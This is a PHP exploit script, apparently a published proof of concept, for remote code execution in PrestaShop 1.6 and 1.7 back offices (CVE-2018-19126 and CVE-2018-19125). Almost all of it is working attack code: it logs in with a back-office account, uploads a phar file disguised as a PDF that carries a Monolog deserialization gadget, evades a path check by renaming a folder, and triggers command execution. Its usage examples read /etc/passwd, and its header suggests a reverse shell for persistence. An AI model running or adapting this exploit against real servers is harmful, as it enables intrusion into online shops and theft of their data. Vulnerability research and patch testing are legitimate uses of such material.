<?php
/**
*
* PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution
* See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation.
*
* Chaining multiple vulnerabilities to trigger deserialization via phar.
*
* Date:
* December 1st, 2018
*
* Author:
* farisv
*
* Vendor Homepage:
* https://www.prestashop.com/
*
* Vulnerable Package Link:
* https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip
*
* CVE :
* - CVE-2018-19126
* - CVE-2018-19125
*
* Prerequisite:
* - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4.
* - Back Office account (logistician, translator, salesman, etc.).
*
* Usage:
* php exploit.php back-office-url email password func param
*
* Example:
* php exploit.php http://127.0.0.1/admin-dev/ salesman@shop.com 54l35m4n123
* system 'cat /etc/passwd'
*
* Note:
* Note that the upload directory will be renamed and you can't upload the
* malicious phar file again if the folder name is not reverted. You might want
* to execute reverse shell to gain persistence RCE or include the command to
* rename the folder again in your payload (you need to know the path to the
* upload directory).
*
* FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
* THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
*
*/
namespace PrestaShopRCE {
class Exploit {
private $url;
private $email;
private $passwd;
private $cmd;
private $func;
private $param;
public function __construct($url, $email, $passwd, $func, $param) {
$this->url = $url;
$this->email = $email;
$this->passwd = $passwd;
$this->func = $func;
$this->param = $param;
}
private function post($path, $data, $cookie) {
$curl_handle = curl_init();
$options = array(
CURLOPT_URL => $this->url . $path,
CURLOPT_HEADER => true,
CURLOPT_POST => 1,
CURLOPT_POSTFIELDS => $data,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_COOKIE => $cookie
);
curl_setopt_array($curl_handle, $options);
$raw = curl_exec($curl_handle);
curl_close($curl_handle);
return $raw;
}
private function fetch_cookie($raw) {
$header = "Set-Cookie: ";
$cookie_header_start = strpos($raw, $header);
$sliced_part = substr($raw, $cookie_header_start + strlen($header));
$cookie = substr($sliced_part, 0, strpos($sliced_part, ';'));
return $cookie;
}
public function run() {
// Login and get PrestaShop cookie
$data = array(
'email' => $this->email,
'passwd' => $this->passwd,
'submitLogin' => '1',
'controller' => 'AdminLogin',
'ajax' => '1'
);
$cookie = "";
$raw = $this->post('/', $data, $cookie);
$prestashop_cookie = $this->fetch_cookie($raw);
// Get FileManager cookie
$data = array();
$cookie = $prestashop_cookie;
$raw = $this->post('/filemanager/dialog.php', $data, $cookie);
$filemanager_cookie = $this->fetch_cookie($raw);
// Craft deserialization gadget
$gadget = new \Monolog\Handler\SyslogUdpHandler(
new \Monolog\Handler\BufferHandler(
['current', $this->func],
[$this->param, 'level' => null]
)
);
// Craft malicious phar file
$phar = new \Phar('phar.phar');
$phar->startBuffering();
$phar->addFromString('test', 'test');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($gadget);
$phar->stopBuffering();
// Change the extension
rename('phar.phar', 'phar.pdf');
// Cookie for next requests
$cookie = "$prestashop_cookie; $filemanager_cookie";
// Upload phar.pdf
$curl_file = new \CurlFile('phar.pdf', 'application/pdf', 'phar.pdf');
$data = array(
'file' => $curl_file
);
$raw = $this->post('/filemanager/upload.php', $data, $cookie);
// Rename image directory to bypass realpath() check
$data = array(
'name' => 'renamed'
);
$raw = $this->post(
'/filemanager/execute.php?action=rename_folder',
$data,
$cookie
);
// Trigger deserialization
// The '/img/cms/' substring is important to bypass string check
$data = array(
'path' => 'phar://../../img/renamed/phar.pdf/img/cms/'
);
$raw = $this->post(
'/filemanager/ajax_calls.php?action=image_size',
$data,
$cookie
);
// Display the raw result
print $raw;
}
}
}
/*
* Based on
* https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/
*/
namespace Monolog\Handler {
class SyslogUdpHandler {
protected $socket;
function __construct($param) {
$this->socket = $param;
}
}
class BufferHandler {
protected $handler;
protected $bufferSize = -1;
protected $buffer;
protected $level = null;
protected $initialized = true;
protected $bufferLimit = -1;
protected $processors;
function __construct($methods, $command) {
$this->processors = $methods;
$this->buffer = [$command];
$this->handler = clone $this;
}
}
}
namespace {
if (count($argv) != 6) {
$hint = "Usage:\n php $argv[0] back-office-url email password func param\n\n";
$hint .= "Example:\n php $argv[0] http://127.0.0.1/admin-dev/ ";
$hint .= "salesman@shop.com 54l35m4n123 system 'uname -a'";
die($hint);
}
if (!extension_loaded('curl')) {
die('Need php-curl');
}
$url = $argv[1];
$email = $argv[2];
$passwd = $argv[3];
$func = $argv[4];
$param = $argv[5];
$exploit = new PrestaShopRCE\Exploit($url, $email, $passwd, $func, $param);
$exploit->run();
}
